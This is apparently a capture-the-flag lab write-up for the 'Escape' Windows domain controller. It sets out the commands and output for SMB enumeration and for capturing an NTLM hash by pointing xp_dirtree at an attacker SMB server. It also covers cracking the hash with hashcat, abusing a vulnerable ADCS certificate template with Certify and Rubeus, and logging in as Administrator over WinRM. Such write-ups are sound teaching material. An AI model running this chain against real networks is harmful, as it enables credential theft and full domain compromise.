Escape
Enumeration
Rustscan
sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.10.11.202 -- -sV -sC -oA ./{{ip}}
Ports
Open 10.10.11.202:53
Open 10.10.11.202:88
Open 10.10.11.202:135
Open 10.10.11.202:139
Open 10.10.11.202:389
Open 10.10.11.202:445
Open 10.10.11.202:464
Open 10.10.11.202:593
Open 10.10.11.202:636
Open 10.10.11.202:1433
Open 10.10.11.202:3268
Open 10.10.11.202:3269
Open 10.10.11.202:5985
Open 10.10.11.202:9389
Services
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-03-08 01:48:42Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 63970/tcp): CLEAN (Timeout)
| Check 2 (port 6410/tcp): CLEAN (Timeout)
| Check 3 (port 50586/udp): CLEAN (Timeout)
| Check 4 (port 55857/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-03-08T01:49:35
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
CrackMapExec
The guest user has read access to Public
cme smb 10.10.11.202 --shares -u 'guest' -p ''
SMB 10.10.11.202 445 DC
SMB 10.10.11.202 445 DC [+] sequel.htb\guest:
SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share
SMB
I used smbmap to check if any files are present on the Public share
smbmap -u "guest" -p "" -R Public -H 10.10.11.202
[+] IP: 10.10.11.202:445 Name: sequel.htb
Disk Permissions Comment
---- ----------- -------
Public READ ONLY
.\Public\*
dr--r--r-- 0 Sat Nov 19 12:51:25 2022 .
dr--r--r-- 0 Sat Nov 19 12:51:25 2022 ..
fr--r--r-- 49551 Sat Nov 19 12:51:25 2022 SQL Server Procedures.pdf
Lets download the file using smbclient
smbclient //10.10.11.202/Public
get "SQL Server Procedures.pdf"
Great the file contains some credentials to connect to the sqlserver
Foothold
Exploitation
SQLServer: Steal NetNTLM Hash
After connecting to the sqlserver using impacket-mssqlclient I discovered that I'm able to use xp_dirtree
Enumeration
SQL> EXEC sp_helprotect 'xp_dirtree';
Owner Object Grantee Grantor ProtectType Action Column
------ -------------------- ------------ ------- ----------- -------------- ------
sys xp_dirtree public dbo b'Grant ' Execute .
Exploitation
First I setup a smbserver on our attacking machine
impacket-smbserver -smb2support smb ./smb
Next part is to execute xp_dirtree to get a connection on our smbshare
EXEC master.sys.xp_dirtree '\\10.10.14.36\smb'
Got the hash
[*] Incoming connection (10.10.11.202,52872)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:CENSORED:CENSORED
Cracking the hash is also working just fine
hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
SQL_SVC::sequel:CENSORED:CENSORED:CENSORED:CENSORED
Leaked Passwords
Using evil-winrm I was able to get access to the system While checking for interesting files I stumbled across a SQLServer Log called ERRORLOG.BAK
In that file we can identify a new user account and a password
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'CENSORED'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Escalation
Local Enumeration
As always I started to enumerate again using the newly gathered credentials First thing I checked was the groups I'm in which made me aware to check for an AD Certificate Service
GROUP INFORMATION
-----------------
Everyone
BUILTIN\Remote Management Users
BUILTIN\Users
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Certificate Service DCOM Access
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
NT AUTHORITY\NTLM Authentication
Checking for vulnerable Certificate Templates
.\Certify.exe find /vulnerable
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
...
Exploitation
Certificate: Localadmin
I'll now generate a new certificate using certify.exe for the user Administrator
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
Convert the certificate for later usage with rubeus
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
After transferring the converted certificate to my target I use it to generate a TGT and display the NTLM hash to use it with evil-winrm
.\Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /getcredentials
Administrator
evil-winrm -H "CENSORED" -u "administrator" -i 10.10.11.202
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/7/2023 1:34 PM 34 root.txt
Last updated